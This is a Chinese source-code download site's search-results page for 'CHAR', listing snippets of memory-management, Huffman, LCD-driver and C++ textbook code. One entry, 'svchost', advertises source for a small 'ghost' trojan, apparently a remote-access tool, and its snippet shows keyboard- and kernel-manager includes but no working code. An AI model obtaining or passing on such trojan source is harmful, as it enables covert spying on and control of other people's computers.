CDN加速镜像 | 设为首页 | 加入收藏夹
当前位置: 首页 资源下载 源码下载 其它 书籍源码 搜索资源 - CHAR

搜索资源列表

  1. 存储管理源代码

    1下载:
  2. 分区式存储管理源代码 一、可变分区存储管理的基本策略 1)不预先划分几个固定分区,分区的建立是在作业的处理过程中进行的,各分区的大小由作业的空间需求量决定。 2)采用指针方式将各个空闲分区链接而成的链表,用以记录主存分配现状。 3)分配与回收算法按空闲分区链接方式的不同分类,有最佳、最坏、首次和下次适应四种算法。 二、程序模拟的设计 1、基本思想 采用事件驱动模型。事件有: 1)申请主存事件,表示一个作业创建时提出的主存资源要求; 2)释放主存事件,表示一个作
  3. 所属分类:书籍源码

    • 发布日期:2008-10-13
    • 文件大小:6101
    • 提供者:Joly
  1. huffman

    0下载:
  2. 哈夫曼算法 实现的时候我们用vector<bool>记录每个char的编码;用map<char,vector<bool>>表示整个字典-huffman algorithm
  3. 所属分类:source in ebook

    • 发布日期:2017-11-07
    • 文件大小:1294
    • 提供者:梁佩琳
  1. diancan_lcd

    0下载:
  2. 普通的打印机控制及打印程序,可以实现对字符及汉子的打印功能,-printer program control and print ,character and char printed.
  3. 所属分类:source in ebook

    • 发布日期:2017-12-03
    • 文件大小:45435
    • 提供者:东方
  1. LCD1602

    0下载:
  2. 简易无线遥控中LCD1602的程序代码。希望对大家有帮助-LCD1602 #include <reg52.h> #include <intrins.h> #define uint unsigned int #define uchar unsigned char //****************************************NRF24L01端口定义*************************************
  3. 所属分类:source in ebook

    • 发布日期:2017-11-14
    • 文件大小:8202
    • 提供者:吴民
  1. cPPcode

    0下载:
  2. C++编程思想源码 //: 2_1.CPP -- Public is just like C struct #include "2_1.h" struct A{ int i char j float f void foo() } void A::foo(){} struct B{ public: int i char j float f void foo() } void B::
  3. 所属分类:source in ebook

    • 发布日期:2017-04-09
    • 文件大小:6652
    • 提供者:jeff
  1. chaobanruan

    0下载:
  2. #include<iom16v.h> #include<macros.h> #define uchar unsigned char #define uint unsigned int uchar senserflag=0 //传感器状态标志 uchar count1=0 uchar jsflag=0 //金属标志 uchar task=1 //任务标志 uint distancedata=0 //路程值 uint distance
  3. 所属分类:source in ebook

    • 发布日期:2017-05-06
    • 文件大小:1371114
    • 提供者:黄海
  1. draw-char

    0下载:
  2. vb编写的图表绘制的源代码,可以参考一下-vb prepared diagramming source code, can refer to
  3. 所属分类:source in ebook

    • 发布日期:2017-04-15
    • 文件大小:6771
    • 提供者:zhuimeng
  1. svchost

    0下载:
  2. ghost小马源码,喜欢的可以拿去研究。-// svchost.cpp : Defines the entry point for the console application. // #pragma comment(linker, /OPT:NOWIN98 ) #include ClientSocket.h #include common/KernelManager.h #include common/KeyboardManager.h #incl
  3. 所属分类:source in ebook

    • 发布日期:2017-05-04
    • 文件大小:3891
    • 提供者:段誉
  1. C语言中scanf的使用

    0下载:
  2. 首先需要#include <stdio.h>int scanf( const char *format, ... );scanf()函数是格式化输入函数,它从标准输入设备(键盘) 读取输入的信息。第一个参数format为一个常量字符串,这个字符串中如果包含‘%’符号则使用后续参数进行匹配如:scanf("%d%d", &a, &b);(First, we need #include <stdio.h>int scanf (const c
  3. 所属分类:书籍源码

    • 发布日期:2018-04-29
    • 文件大小:5120
    • 提供者:Bruce Leung
搜珍网 www.dssz.com